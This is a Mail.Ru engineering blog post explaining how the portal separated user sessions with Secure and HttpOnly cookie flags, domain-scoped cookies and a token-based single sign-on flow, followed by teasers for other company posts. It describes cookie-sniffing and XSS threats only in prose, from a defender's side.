Divide and Govern: How We Implemented Session Separation at Mail.Ru

Mail.Ru is a gigantic portal created more than 15 years ago. Since then we have evolved from a minor web project to the most visited Runet site online. The portal comprises an enormous number of services, each with its own story and separate team of developers, who had to do their utmost to make sure all projects (new, old and those joining the portal as it evolved) shared a single user authentication system. Then after many years we were eventually faced with a task that was almost the opposite: separate user sessions. Why this was necessary, what obstacles tripped us up and how we got around them will be covered in this post.

If we take a trip back in time when all our services were part of a single second-level domain and separated into third-level domains, introducing common authorization seemed a rather trivial issue. To accomplish this task, we simply chose the classic (at the time) approach: we introduced a single authentication form to be shared among all available resources, set an authentication cookie on the second-level domain and started verifying transmitted cookies on the server side. Nice, simple and functional:

Little by little, the services grew accustomed to using a common authentication cookie, added %LOGIN_NAME% to it as a more convenient way to display it on portal pages, and eventually began communicating with cookies using JavaScript on their pages. However, the times they were a-changing…

The enemy never sleeps

As our company grew, user accounts became desired prey for wrong-doers of all sorts. The first to come just used brute force. These intruders did nothing but brute-forced user passwords in search of people who memorialized their date of birth or pet name.

Then the phishers were not long to follow, sending portal users emails similar to ones they received from Mail.Ru. These messages contained either links to sites that pretended to be the portal’s authentication point or used other methods to phish passwords from users.


We don’t sleep either

To fight phishers and brute-forcers, antispam and security teams were called in to action. The technology and user education eventually yielded fruit, and security breaches declined considerably. (Although weak passwords and human gullibility are the main factors aiding hackers even as we speak today – but that’s for another article, folks.)

After a little while this business started making real money, and the small fries were joined by sharks, some of whom sought out vulnerabilities in the web services and used them to gain access to user accounts. To add insult to injury, they also found ways to listen to the traffic between the user’s computer and our services. The target of all this illegal activity was the user authentication session – in other words, the portal’s authentication cookie.

Is HTTPS always HTTPS?

We hid the services critical in terms of user data security, e. g. Mail or Cloud, behind HTTPS. It appeared at the time that using a secure HTTPS connection protocol was a solution to our problems. The data transmitted through such a connection is encrypted and signed so third parties cannot read or alter them.

But what happens if a hacker located somewhere between the server and browser forces the user’s browser visit the portal site via an insecure protocol? To make this happen, it is enough to intercept any HTTP-response sent to a user in a non-encrypted form and add an image to it with the correct address:

The hacker thus forces the user’s browser to visit the portal via an insecure connection. As shown in the diagram, the session_id cookie is automatically sent to the portal server over a non-encrypted connection, and sure enough, it is low hanging fruit for a hacker to intercept. After that, they can use the account as easily as if they knew the actual password. To prevent this the server can flag the cookie as secure. It will signal the browser that the cookie should be sent to the server only if the connection uses the HTTPS protocol. The cookie is flagged as follows:

This is an important point to take into account when configuring HTTPS on the server: setting a Secure flag for authentication cookies is an absolute must for modern web services. This is even more true if you have a big portal. If there is centralized authentication, using HTTP for a service in the portal’s domain gives the green light to anyone seeking to bypass HTTPS. However, even if everything is behind HTTPS and resistant to traffic interception, there is still always the risk of exploiting web service vulnerabilities, e. g. XSS. This forces companies to either scrap common authentication altogether, or choose another way (which we get into here later).


“Cross-site scripting (or XSS) may be used, inter alia, to bypass access controls or steal user credentials,” according to a translation of the Russian Wikipedia article. When an attacker exploits XSS vulnerabilities, the authentication cookie is what they are after in most cases, which they can use to access the user’s account. To hijack a user session, hackers typically use a JS code similar to this one:

Hands down the most important and effective method for dealing with XSS errors is to prevent them from ever being created through testing, developer training, code reviews and security audits. However, when there are lots of projects with different well-staffed teams working on them, it is impossible to have an absolutely error-free code. Our main goal is to protect user accounts; we must ensure they are safe regardless of whether or not the system has XSS vulnerabilities or if someone is trying to exploit them.

Here’s where HttpOnly cookies come to the rescue. HttpOnly cookies are impossible to read with JavaScript, but they are still accessible to server scripts like any other cookie. Despite the fact that the technique is far from new (e. g. Microsoft introduced HttpOnly cookies 8 years ago in IE6 SP1), not everyone knows why it’s worthwhile to use them wherever possible. Cookies inaccessible to JS are a kind of second line of defense from evil-doers planning an XSS attack, as a malicious code that snuck its way on the page won’t be able to steal user cookies using document.cookie. In addition, using the HttpOnly flag in cookies helps protect user accounts from untrusted scripts, banners or counters that may be loaded from resources beyond the company’s control.

Nothing is perfect under the sun, and HttpOnly cookies aren’t a panacea: the HttpOnly flag does not provide complete shelter from XSS vulnerabilities. However, it does narrow its exploitation possibilities greatly by not allowing a JS code to hijack an authentication session. But there are also situations where it cannot be used. For example, when Flash is being used actively. However, this isn’t reason enough to give up entirely on HttpOnly cookies. You can minimize the risks by combining the two types of cookies and using HttpOnly wherever possible. So now we’ve added the Secure and HttpOnly flags to cookies – what else is there to do?

Domain-specific cookies

As you can recall, to ensure end-to-end authentication for all our company services we used to use a single authentication cookie set at the second-level domain. A common authentication cookie is more than just convenient for users; it is also a way to gain access to all services at once through just a single vulnerability in the code of any of the company’s projects. Thus, by stealing the authentication cookie from the a.site-with-common-authentication.ru service, we gain access to b. site-with-common-authentication.ru.

Traffic sniffing works in a similar way unless secure cookies are used. If one company service is secure and uses HTTPS while another uses HTTP, all you have to do is instruct the browser to call to the less secure service, steal the authentication cookie and use it for authentication in the secure service.

Now to address this issue, cookies are added to the domain attribute:

This cookie will now be sent by the browser only in response to queries for the a.company.com domain and its subdomains. When using domain-specific cookies, if any one service has a vulnerability, it will be the only one to come under attack. This is true for both XSS and other vulnerabilities.

Wrapping up

So we have converted our most critical services to HTTPS, introduced domain-specific cookies, searched for and eliminated vulnerabilities, and generally are trying to protect ourselves and our users from every angle. But what about still providing single authentication? To do this in our diverse environment with co-existing HTTP and HTTPS, we introduced additional domain-specific cookies as extra security measures for each and every project. In addition to the legacy main authentication cookie (Mpop), an additional cookie (sdc) is also set for the project’s domain. User authentication will be valid only if both cookies – Mpop and the intradomain sdc cookie – are present.

The session separation mechanism at Mail.Ru works as follows: user authentication always occurs via a single sign-on point, auth.mail.ru, which requires a login and password (and potentially second factor) and issues a domain cookie .auth.mail.ru with Secure and HttpOnly flags. None of the projects have access to the user’s login and password. The .auth.mail.ru cookie is also unavailable to any of the projects.

When a user visits a project site he has not yet signed in, his request will be forwarded to the authentication point, which authenticates him by the .auth.mail.ru cookie, generates a one-time token and redirects to the project’s listener page with this token. The project’s listener proxies the token to the authentication point, which uses it to generate a project cookie, this time for .project.mail.ru. This way you retain all the advantages of the portal’s single authentication, with separate authenticated access to different resources provided in a user-transparent manner.

Separate sessions are a small but critical step in the overall concept of separation of access we are all so dedicated to. Separation of access allows us to protect our resources in a more consistent manner, without relying solely on the “outer circuit” – even if an attacker manages to hijack a session on one of the resources or compromise it in some other way, the damage sustained by the user will be minimal. In addition to separate sessions, there are also other separated access techniques invisible to users (which is pretty cool!). But we’ll save that for another post.

To recap, we can conclude that even services united on a common platform must (under the hood) go their separate ways, and we are currently applying this approach on our own portal. We are certain that very soon other companies in Russia will follow suit, and a considerable portion of cyber criminals will find themselves suddenly out of work. The enemy shall not pass!

Read More

Neural Networks Can Help in Fighting Cancer

Last year, Artur Kadurin and I decided to join a new wave of neural network training that that is known as Deep Learning. It became clear that machine learning was practically unused in many areas, and we, in turn, understood how it could be applied in practice. We only needed to find an interesting field of knowledge and recognized experts in this field. So we met with a team from Insilico Medicine, which is a resident of the BMT cluster of the Skolkovo Foundation, and developers from MIPT. We decided to work together to find drugs against cancer.


Read More

Design principles of Tarantool

I’m publishing a transcript of my talk at Highload Conference in Moscow in Spring 2015. It is actually the first part out of four (yes, I got a big conference slot back then :))

Here’s how I came to the idea of giving this talk. I don’t like speaking about new features, especially about upcoming features. While people enjoy listening to such talks, I don’t like spoiling the opportunity by presenting a feature before it’s ready. But people are also curious to learn how things work. So, this talk is about how it all works – or should work, from my perspective, – in a modern database management system (DBMS).


Read More

Switching from Tarantool 1.5 to Tarantool 1.6

Hey! I’d like to tell you how one of our projects migrated from Tarantool 1.5 to Tarantool 1.6. Do you need to migrate to a newer version if everything works fine as it is? Is it an easy thing to pull off if you have thousands of lines of code? How to make sure live users aren’t affected? What difficulties lie ahead? What’s in it for us? If you want to know the answers, read on.


Read More

Algorithm-Driven Design: How Artificial Intelligence Is Changing Design

Album covers processed through Prisma and Glitché (View large version)

I’ve been following the idea of algorithm-driven design for several years now and have collected some practical examples. The tools of the approach can help us to construct a UI, prepare assets and content, and personalize the user experience. The information, though, has always been scarce and hasn’t been systematic.

However, in 2016, the technological foundations of these tools became easily accessible, and the design community got interested in algorithms, neural networks and artificial intelligence (AI). Now is the time to rethink the modern role of the designer.


Read More

Efficient storage: how we went down from 50 PB to 32 PB

As the Russian rouble exchange rate slumped two years ago, it drove us to think of cutting hardware and hosting costs for the Mail.Ru email service. To find ways of saving money, let’s first take a look at what emails consist of.


Indexes and bodies account for only 15% of the storage size, whereas 85% is taken up by files. So, files (that is attachments) are worth exploring in more detail in terms of optimization. At that time, we didn’t have file deduplication in place, but we estimated that it could shrink the total storage size by 36% since many users receive the same messages, such as price lists from online stores or newsletters from social networks containing images and so on. In this article, I’m going to describe how we implemented a deduplication system under the supervision of Albert Galimov. (more…)

Read More

Implementing DMARC to Protect the Corporate Domain From Spoofing

In this post, we will again discuss the problem of forged sender addresses (AKA ‘spoofing’). In recent years, such cases have become increasingly frequent: everything can be spoofed, whether it is an e-mail with utility bills, a message from a tax inspectorate, bank, etc. This problem can be addressed by configuring a strict DMARC policy. As an e-mail service, we have checked all incoming messages by using DMARC since February 2013. We were the first e-mail service in RuNet (in Russian) to support DMARC standards. Unfortunately, this is not enough to minimize the number of spoofed messages. The main thing is to ensure that a strict DMARC policy is supported on the sender side. This is why we are tirelessly emphasizing this issue through active explanatory campaigns and strongly urging everyone to implement a strict DMARC policy. (more…)

Read More